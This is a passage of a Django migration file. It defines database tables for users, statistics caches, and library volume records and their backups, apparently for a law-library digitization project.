('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('volume', models.IntegerField(blank=True, null=True)),
('publicationyear', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'shared_volume_tag_stats',
},
),
migrations.CreateModel(
name='Statcache',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=32, null=True)),
('updated_at', models.DateTimeField()),
('created_at', models.DateTimeField(blank=True, null=True)),
('value', models.IntegerField(blank=True, null=True)),
('offset', models.SmallIntegerField(blank=True, null=True)),
('json', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'statcache',
},
),
migrations.CreateModel(
name='Users',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('privlevel', models.CharField(max_length=3)),
('email', models.CharField(max_length=320)),
('password', models.CharField(max_length=64)),
('active', models.IntegerField()),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('remember_token', models.CharField(blank=True, max_length=100, null=True)),
],
options={
'db_table': 'users',
},
),
migrations.CreateModel(
name='VolumeBackups',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('hollis_no', models.CharField(max_length=128)),
('volume', models.CharField(blank=True, max_length=64, null=True)),
('publicationdate', models.DateField(blank=True, null=True)),
('publisher', models.CharField(blank=True, max_length=255, null=True)),
('publicationyear', models.IntegerField(blank=True, null=True)),
('reporter_id', models.IntegerField(blank=True, null=True)),
('publicationdategranularity', models.CharField(blank=True, max_length=1, null=True)),
('nom_volume', models.CharField(blank=True, max_length=1024, null=True)),
('nominative_name', models.CharField(blank=True, max_length=1024, null=True)),
('series_volume', models.CharField(blank=True, max_length=1024, null=True)),
('spine_start_date', models.IntegerField(blank=True, null=True)),
('spine_end_date', models.IntegerField(blank=True, null=True)),
('start_date', models.IntegerField(blank=True, null=True)),
('end_date', models.IntegerField(blank=True, null=True)),
('page_start_date', models.IntegerField(blank=True, null=True)),
('page_end_date', models.IntegerField(blank=True, null=True)),
('redaction_profile', models.CharField(blank=True, max_length=1, null=True)),
('contributing_library', models.CharField(blank=True, max_length=256, null=True)),
('rare', models.CharField(blank=True, max_length=255, null=True)),
('hscrev', models.CharField(blank=True, max_length=255, null=True)),
('hsc_accession', models.DateTimeField(blank=True, null=True)),
('needs_repair', models.CharField(blank=True, max_length=255, null=True)),
('missing_text_pages', models.CharField(blank=True, max_length=10000, null=True)),
('created_by', models.IntegerField()),
('bibrev', models.CharField(blank=True, max_length=1, null=True)),
('pages', models.IntegerField(blank=True, null=True)),
('dup', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('replaced_pages', models.CharField(blank=True, max_length=1024, null=True)),
('cases', models.IntegerField(blank=True, null=True)),
('marginalia', models.IntegerField(blank=True, null=True)),
('pop', models.CharField(blank=True, max_length=1024, null=True)),
('title', models.CharField(blank=True, max_length=1024, null=True)),
('handfeed', models.IntegerField(blank=True, null=True)),
('imgct', models.IntegerField(blank=True, null=True)),
('hold', models.IntegerField(blank=True, null=True)),
('request_id', models.IntegerField(blank=True, null=True)),
('pub_del_pg', models.IntegerField(blank=True, null=True)),
('notes', models.CharField(blank=True, max_length=512, null=True)),
('pubdel_pages', models.CharField(blank=True, max_length=512, null=True)),
('original_barcode', models.CharField(blank=True, max_length=64, null=True)),
('scope_reason', models.CharField(blank=True, max_length=16, null=True)),
('out_of_scope', models.IntegerField()),
('meyer_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
('uv_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
('meyer_ky_truck', models.CharField(blank=True, max_length=32, null=True)),
('meyer_pallet', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'volume_backups',
},
),
migrations.CreateModel(
name='Volumes',
fields=[
('bar_code', models.CharField(max_length=64, primary_key=True, serialize=False, unique=True)),
('hollis_no', models.CharField(max_length=128)),
('volume', models.CharField(blank=True, max_length=64, null=True)),
('publicationdate', models.DateField(blank=True, null=True)),
('publisher', models.CharField(blank=True, max_length=255, null=True)),
('publicationyear', models.IntegerField(blank=True, null=True)),
('reporter_id', models.IntegerField(blank=True, null=True)),
('publicationdategranularity', models.CharField(blank=True, max_length=1, null=True)),
('nom_volume', models.CharField(blank=True, max_length=1024, null=True)),
('nominative_name', models.CharField(blank=True, max_length=1024, null=True)),
('series_volume', models.CharField(blank=True, max_length=1024, null=True)),
('spine_start_date', models.IntegerField(blank=True, null=True)),
('spine_end_date', models.IntegerField(blank=True, null=True)),
('start_date', models.IntegerField(blank=True, null=True)),
('end_date', models.IntegerField(blank=True, null=True)),
('page_start_date', models.IntegerField(blank=True, null=True)),
('page_end_date', models.IntegerField(blank=True, null=True)),
('redaction_profile', models.CharField(blank=True, max_length=1, null=True)),
('contributing_library', models.CharField(blank=True, max_length=256, null=True)),
('rare', models.CharField(blank=True, max_length=255, null=True)),
('hscrev', models.CharField(blank=True, max_length=255, null=True)),
('hsc_accession', models.DateTimeField(blank=True, null=True)),
('needs_repair', models.CharField(blank=True, max_length=255, null=True)),
('missing_text_pages', models.CharField(blank=True, max_length=10000, null=True)),
('created_by', models.IntegerField()),
('bibrev', models.CharField(blank=True, max_length=1, null=True)),
('pages', models.IntegerField(blank=True, null=True)),
('dup', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('replaced_pages', models.CharField(blank=True, max_length=1024, null=True)),
('cases', models.IntegerField(blank=True, null=True)),
('marginalia', models.IntegerField(blank=True, null=True)),
('pop', models.CharField(blank=True, max_length=1024, null=True)),
('title', models.CharField(blank=True, max_length=1024, null=True)),
('handfeed', models.IntegerField(blank=True, null=True)),
('imgct', models.IntegerField(blank=True, null=True)),
('hold', models.IntegerField(blank=True, null=True)),
('request_id', models.IntegerField(blank=True, null=True)),
('pub_del_pg', models.IntegerField(blank=True, null=True)),
('notes', models.CharField(blank=True, max_length=512, null=True)),
('pubdel_pages', models.CharField(blank=True, max_length=512, null=True)),
('original_barcode', models.CharField(blank=True, max_length=64, null=True)),
('scope_reason', models.CharField(blank=True, max_length=16, null=True)),
('out_of_scope', models.IntegerField()),
('meyer_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
('uv_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
('meyer_ky_truck', models.CharField(blank=True, max_length=32, null=True)),
('meyer_pallet', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'volumes',
},
),
]
| 59.817881 | 114 | 0.569388 | 5,203 | 54,195 | 5.770325 | 0.054392 | 0.110615 | 0.106085 | 0.138727 | 0.922026 | 0.898511 | 0.873897 | 0.861706 | 0.854911 | 0.827466 | 0 | 0.012815 | 0.280081 | 54,195 | 905 | 115 | 59.883978 | 0.75669 | 0.001255 | 0 | 0.768116 | 1 | 0 | 0.146331 | 0.014171 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.001115 | 0.00223 | 0 | 0.006689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.